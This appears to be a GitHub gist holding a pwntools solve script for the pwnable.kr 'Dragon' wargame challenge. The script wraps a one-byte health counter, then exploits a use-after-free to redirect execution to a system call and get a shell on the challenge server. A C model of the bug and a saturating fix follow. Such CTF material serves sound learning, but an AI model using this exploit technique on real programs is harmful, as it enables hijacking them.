@Pascal-0x90
Created March 9, 2021 23:54
Pwnable.kr Solve: Dragon
#!/usr/bin/env python
###################################
# Std imports
import sys
# Third party imports
from pwn import *

# Binary (path passed as the first argument, e.g. ./dragon)
BINARY = sys.argv[1]
# Pwntools binary info
context(os='linux', arch='i386')
r = ROP(BINARY)   # not used by this solve, kept from the template
e = ELF(BINARY)
l = e.libc        # not used by this solve, kept from the template
# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9004)
# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################
'''
Notes:
- The dragon's health is a single byte. Max is 0xff, so we can overflow it and win
  (a big number becomes a small number).
- This then lets us overwrite a previously freed location via a use-after-free,
  since the same buffer that was freed gets reused.
- The "name" field lands at the same address as the dragon we defeated.
'''
SHELLCODE = b""   # unused in this solve
JUNK = b""        # unused in this solve
WIN = 0x08048DBF  # address written over the freed dragon's chunk
'''
Steps:
1. Kill ourselves.
   - This mallocs the player and the dragon, then frees the dragon.
2. Overflow the dragon's health, defeat the dragon, overwrite the former dragon with the system address.
3. Instead of calling PrintPlayerInfo, the program calls the system instruction in SecretRoom.
'''

def die(p):
    # Pick the Knight and attack until we die, so the dragon chunk gets freed.
    p.clean()
    p.sendline(b"2")
    p.clean()
    p.sendline(b"1")
    p.clean()
    p.sendline(b"1")

def overheal(p):
    p.clean()
    # Select a fighter. Pick the Priest, because the dragon can heal itself.
    p.sendline(b"1")
    # Steps: let the dragon heal twice, then restore mana. Four rounds is how many
    # it takes for the single-byte health to wrap around.
    for i in range(4):
        p.sendline(b"3")
        p.sendline(b"3")
        p.sendline(b"2")
    # Overwrite with our desired win condition
    p.clean()
    p.sendline(p32(WIN))

die(p)
overheal(p)
p.interactive()
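The single-byte health counter the notes describe, modelled in C as an added illustration (this is not the challenge binary's code; `dragon_t`, `heal_wrapping`, `heal_saturating` and `run_heals` are hypothetical names chosen here). The wrapping version shows why repeated heals turn a large value into a small one, and the saturating version is the clamp that closes the bug; `heals_wrap` is the invariant check a unit test for such a counter should carry.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical model of the bug in the notes: health kept in one unsigned byte.
 * Illustration only, not the dragon binary's real code. */
typedef struct {
    uint8_t hp;   /* single-byte health: wraps past 0xff */
} dragon_t;

/* Wrapping heal: reproduces the defect. The sum is truncated to 8 bits. */
uint8_t heal_wrapping(dragon_t *d, unsigned amount) {
    d->hp = (uint8_t)(d->hp + amount);
    return d->hp;
}

/* Saturating heal: the fix. Clamps at UINT8_MAX instead of wrapping. */
uint8_t heal_saturating(dragon_t *d, unsigned amount) {
    unsigned sum = d->hp + amount;
    d->hp = sum > UINT8_MAX ? UINT8_MAX : (uint8_t)sum;
    return d->hp;
}

/* Apply `rounds` heals of `amount` starting from `start`; returns the final hp.
 * If `wrapped_out` is non-NULL it is set to true when hp ever went down. */
uint8_t run_heals(uint8_t start, unsigned amount, int rounds,
                  uint8_t (*heal)(dragon_t *, unsigned), bool *wrapped_out) {
    dragon_t d = { .hp = start };
    bool wrapped = false;
    for (int i = 0; i < rounds; i++) {
        uint8_t before = d.hp;
        if (heal(&d, amount) < before)   /* healing must never lower hp */
            wrapped = true;
    }
    if (wrapped_out)
        *wrapped_out = wrapped;
    return d.hp;
}

/* Invariant check: does the wrapping heal ever decrease hp in this scenario? */
bool heals_wrap(uint8_t start, unsigned amount, int rounds) {
    bool wrapped;
    run_heals(start, amount, rounds, heal_wrapping, &wrapped);
    return wrapped;
}

int main(void) {
    printf("wrapping:   hp=%u\n", run_heals(200, 30, 4, heal_wrapping, NULL));
    printf("saturating: hp=%u\n", run_heals(200, 30, 4, heal_saturating, NULL));
    return 0;
}
```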